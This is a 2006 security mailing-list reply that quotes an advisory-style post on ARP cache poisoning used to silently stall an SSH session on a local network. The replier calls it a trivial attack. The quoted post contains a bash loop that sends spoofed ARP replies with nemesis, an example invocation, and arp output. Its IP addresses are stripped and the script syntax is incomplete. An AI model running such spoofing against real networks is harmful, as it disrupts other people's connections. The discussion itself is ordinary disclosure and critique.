Correct me if I'm wrong, but isn't this just a trivial ARP poisoning?
If you poison an ARP table anything that happens on upper layers of
the stack (IP communications, as you are saying you poisoned) will be

How were the machines connected? Using a ethernet hub or a switch?

I don't see that as been a effective attack, actually.

On 9 May 2006 10:48:18 -0000, king_purba@xxxxxxxxxxx
<king_purba@xxxxxxxxxxx> wrote:
Author : Ph03n1X
Email : king_purba@xxxxxxxxxxx
Site :
Severity : Moderate


We know that tcp connection will close by sending RST flag.
I try to connect to my openssh server on
slackware 10 from my computer fedora core 4. Then using an
openbsd 3.7, that had same network with slackware n fedora,
try to overwrite ARP cache on my fedora core 4. After arp
cache has been overwriten, all packet from fedora core 4
to slackware 10 is ignored. May be this problem is not only
on ssh but on other tcp protocol.

Exploitation :

1. OpenSSH on slackware has IP and MAC 00:80:48:EB:50:F2
2. Client using Fedora has IP and MAC 00:00:21:27:12:1F
3. Attacker using OpenBSD has IP and MAC 00:c0:26:6f:3a:1a
4. Now, login ssh from to

Before exploitation you can use shell command on
as you wish and also you can manage from

5. ARP cache on before overwriting

fc4-$arp -na
? ( at 00:80:48:EB:50:F2 [ether] on eth0
? ( at 00:11:BB:74:DA:00 [ether] on eth0

6. Overwriting ARP cache on from using nemesis and simple bash script

if [ -z "$5" ]
# Script ini akan mengatakan bahwa IP server ada di MAC xxxx
# Sehingga client tidak menghubungi server melainkan xxxx

echo "Usage : $0 <interface attacker> <ip server ssh> <ip client> <valid MAC address/up to u> <MAC client>"

while true
nemesis arp -v -r -d $1 -S $2 -D $3 -h $4 -m $5 -H $4 -M $5
sleep 2;

openbsd-$./ rl0 00:c0:26:6f:3a:00 00:00:21:27:12:1f

7. Now check ARP cache on after overwriting

fc4-$arp -na
? ( at 00:C0:26:6F:3A:00 [ether] on eth0 <-- ARP cache has been overwriten
? ( at 00:11:BB:74:DA:00 [ether] on eth0

8. Now, back to ssh connection on from Type, any character on ssh console, yep no data connection, you cannot do anything on ssh console because ssh connection has been ignored but not closed.

Relevant Pages

  • Re: misc/148463: [arp] ARP cache can be poisoned or polluted with ease.
    ... Subject: misc/148463: [arp] ARP cache can be poisoned or polluted with ... itigate some of the risk associated with the cache poison issue. ... What about the ARP cache pollution issue? ... tential issues with how FreeBSD implemented the ARP cache. ...
  • Re: MSCS - arp cache/mac-address problems
    ... No the ARP cache should be updated once the virutal server fails over. ... should assume part of the phyical NIC MAC and part virtual. ...
  • Re: Default route doesnt change to wireless device (ath0)
    ... quite the opposite - a link state change is is when you REALLY want ... state (particularly ARP) to be flushed. ... ARP cache should _always_ flush on link ...
  • Re: Stopping Arp poison attacks
    ... I now understand that Dynamic ARP inspection can prevent this technique in most cases. ... However, this is vendor specific, and not every customer uses Cisco. ... Some Cisco switches like the 2950 for instance do not offer DAI. ... between a MAC address and an IP address in ARP cache. ...
  • RE: ARP(4) spoofing?
    ... is LAN facing and permanent entry in the arp cache. ... Disable the dynamic ARP cache on the external interface and make ... because by definition the loopback is not ...